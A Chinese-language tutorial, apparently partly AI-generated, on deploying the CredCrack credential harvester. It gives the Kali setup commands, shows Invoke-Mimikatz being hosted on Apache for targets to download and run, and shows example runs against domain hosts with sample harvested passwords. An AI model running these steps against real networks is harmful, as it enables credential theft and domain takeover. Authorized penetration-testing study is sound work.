ARTICLE DETAIL

资讯详情

深耕网站建设与运营推广的一线实战洞察。

如何快速搭建CredCrack运行环境:Kali Linux + Apache + Invoke-Mimikatz逐步部署教程

如何快速搭建CredCrack运行环境:Kali Linux + Apache + Invoke-Mimikatz逐步部署教程 如何快速搭建CredCrack运行环境Kali Linux Apache Invoke-Mimikatz逐步部署教程【免费下载链接】CredCrackA fast and stealthy credential harvester项目地址: https://gitcode.com/gh_mirrors/cr/CredCrackCredCrack 是一款快速且隐蔽的凭据收集工具credential harvester本教程带你一步步搭建 CredCrack 运行环境从安装 Kali Linux、配置 Apache 服务到部署 Invoke-Mimikatz.ps1 脚本最终完成第一次凭据收集任务。全程约 15 分钟新手也能照做成功。一、CredCrack 能做什么在动手部署之前先花 30 秒了解这个工具的核心能力核心功能说明对应参数凭据收集在内存中递归收集目标 Windows 主机上的明文凭据并自动解析输出默认模式域管理员识别自动比对收集结果将域管理员账号高亮标记自动完成共享目录枚举查看目标主机的共享访问权限C$、ADMIN$ 等-es多线程加速支持批量 IP 并行处理默认 10 线程-t自动化清理任务结束后自动清理临时文件、关闭 Apache自动完成⚠️ 注意项目 README.md 开头标注⛔ DEPRECATED已停止维护作者建议使用后续项目 CrackMapExec。本教程仅用于学习该工具的环境搭建与工作流程请仅在获得明确授权的测试环境中使用。CredCrack 的工作原理可以概括为一句话Apache 托管脚本 → 目标主机下载并执行 Invoke-Mimikatz → 凭据回传 → 本地解析输出因此运行环境只有三个核心依赖Kali Linux Apache Invoke-Mimikatz.ps1这也是本教程的部署主线。二、环境要求一个 Kali Linux 就够CredCrack 主脚本是 credcrack.py基于Python 2编写并且依赖 Kali Linux 自带的经典工具链。完整的环境清单如下组件作用备注Kali Linux运行环境建议虚拟机2020 版本前后均可Python 2解释执行主脚本较新的 Kali 默认只有 Python 3需额外安装Apache2托管收集脚本、接收回传数据脚本会自动启动/停止它smbclient / winexe连接 SMB、在远端执行命令Kali 通常预装Invoke-Mimikatz.ps1PowerSploit 提供的凭据提取脚本必须放在/var/www/目录三、第一步安装 Kali Linux 与基础软件包 如果你已经有一台 Kali 虚拟机直接跳到安装软件包小节。1. 准备 Kali 虚拟机安装方式通过 Kali 官网下载虚拟机镜像VirtualBox / VMware 均可按向导完成初始配置建议配置2 核 CPU、2GB 内存、40GB 磁盘联网方式NAT 或桥接确保能访问目标网段。2. 安装软件包打开终端Terminal执行以下命令更新源并安装依赖sudo apt update sudo apt install -y python2 apache2 smbclient winexe说明python2CredCrack 主脚本使用了 Python 2 语法如print语句必须用它运行apache2作为回传服务器托管Invoke-Mimikatz.ps1和自动生成的creds.phpsmbclient/winexeKali 一般已预装这条命令可以确保万无一失。安装完成后验证版本python2 --version apache2 -v winexe --help | head -n 2四、第二步获取 CredCrack 源码在终端中克隆仓库本教程使用的仓库地址git clone https://gitcode.com/gh_mirrors/cr/CredCrack cd CredCrack项目结构非常轻量核心文件只有一个文件说明credcrack.py主脚本环境准备、IP 校验、共享枚举、凭据收集、结果解析与清理README.md官方说明文档含参数列表和运行示例LICENSEGPL v3 开源协议查看帮助信息确认脚本可以正常加载python2 credcrack.py -h如果看到参数说明-d、-u、-r、-f等说明 Python 2 环境已就绪。五、第三步部署 Invoke-Mimikatz.ps1 并启动 Apache这是最容易卡住的一步CredCrack 启动时会严格检查依赖缺了Invoke-Mimikatz.ps1会直接报错退出。1. 获取 Invoke-Mimikatz.ps1Invoke-Mimikatz.ps1来自微软开源的 PowerSploit 项目Exfiltration 模块。请自行搜索 PowerSploit 仓库并下载Invoke-Mimikatz.ps1这个脚本文件到本地。2. 放入 Web 目录将脚本放到 Apache 的根目录/var/www下这是 credcrack.py 中写死的依赖路径sudo cp Invoke-Mimikatz.ps1 /var/www/3. 启动 Apache 并验证sudo service apache2 start在浏览器或终端访问http://127.0.0.1/Invoke-Mimikatz.ps1能看到脚本内容即部署成功。 小贴士运行收集任务时CredCrack 会自动检查 Apache 是否运行未运行则自动启动任务结束后还会自动停止 Apache 并清理/var/www下的临时文件creds.php、fun.ps1无需手动维护。六、第四步运行第一个收集任务参数速查表参数含义是否必填-d, --domain目标所在域或工作组名✅ 必填-u, --user域用户名✅ 必填-r, --rhost单台目标主机 IP与-f二选一-f, --file目标 IP 列表文件每行一个 IP与-r二选一-l, --lhost本机对外 IP用于目标回传数据收集任务必填-es, --enumshares枚举目标共享目录访问权限可选-t, --threads线程数默认 10可选场景 1枚举单台主机的共享权限python2 credcrack.py -r 192.168.1.100 -d acme -u bob --es执行后会提示输入密码Password:随后输出每台主机的系统信息与共享状态例如192.168.1.100 - Windows Server 2008 R2 Enterprise ... OPEN \\192.168.1.100\NETLOGON OPEN \\192.168.1.100\SYSVOL CLOSED \\192.168.1.100\C$场景 2批量收集凭据文件模式准备一个hosts文件每行一个目标 IP然后执行python2 credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20其中-l 192.168.1.102是你的 Kali 主机在目标网段中的 IP——目标机器正是通过它下载脚本、回传数据的。七、看懂输出The loot has arrived收集成功后终端会打印 ASCII 小羊和 The loot has arrived... 字样随后逐行输出解析到的凭据[*] Host: 192.168.1.102 Domain: ACME User: jsmith Password: Good0ljm1th [*] Host: 192.168.1.103 Domain: ACME User: daguy Password: Pssw0rd1! 1 domain administrators found and highlighted in yellow above!输出中的关键细节黄色高亮的行代表该账号属于域管理员组工具会预先通过net group Domain Admins /domain查询成员名单所有结果会同时写入/tmp/CCloot/l00t汇总文件任务结束时/tmp/CCloot目录会自动改名加时间戳并移动到主目录例如~/CCloot_20260823_10:03:25权限收紧为700防止他人误读。八、常见问题与快速排查报错 / 现象原因解决办法Dependency not met. Please download Invoke-Mimikatz.ps1.../var/www下缺少Invoke-Mimikatz.ps1按第五步重新放置脚本SyntaxError: Missing parentheses in call to print误用了 Python 3 运行改用python2 credcrack.py ...执行NT_STATUS_LOGON_FAILURE域账号或密码错误核对-d、-u参数与输入的密码User is not an admin on ... or the system is not joined to a domain目标账号不是管理员或未加域换一个有管理员权限的账号目标无响应 / 超时445 端口不通或目标不是 Windows先用nmap -p 445 ip探测连通性收不到回传数据-l填的 IP 目标访问不到确认本机 IP 可被目标网段直接访问其他提醒目标系统必须是Windows 且 PowerShell 版本 ≥ 2否则Invoke-Mimikatz无法执行批量任务时可用-t调大线程数但注意不要触发目标主机的账号锁定策略中途中断CtrlC也会触发清理逻辑Apache 和临时文件会被自动处理。九、合规声明与工具展望 凭据收集属于高敏感操作仅限在获得书面授权的渗透测试或内部安全演练中使用未经授权对他人系统使用将触犯法律 项目 README.md 已声明停止维护作者推荐转向CrackMapExec功能更强的后续者CredCrack 目前更适合学习 SMB 凭据收集的整体流程与 Python 多线程编程思路。十、总结本教程按四个步骤完成了 CredCrack 运行环境的全部搭建装环境Kali Linux python2apache2smbclient/winexe拿代码克隆仓库确认credcrack.py可被 Python 2 加载放脚本Invoke-Mimikatz.ps1放入/var/www/并启动 Apache跑任务用-r或-f指定目标-l指定本机 IP查看~/CCloot收集结果。环境搭好之后你就拥有了一个完整的共享枚举 → 凭据收集 → 域管理员识别演练链路。祝实验顺利【免费下载链接】CredCrackA fast and stealthy credential harvester项目地址: https://gitcode.com/gh_mirrors/cr/CredCrack创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
返回列表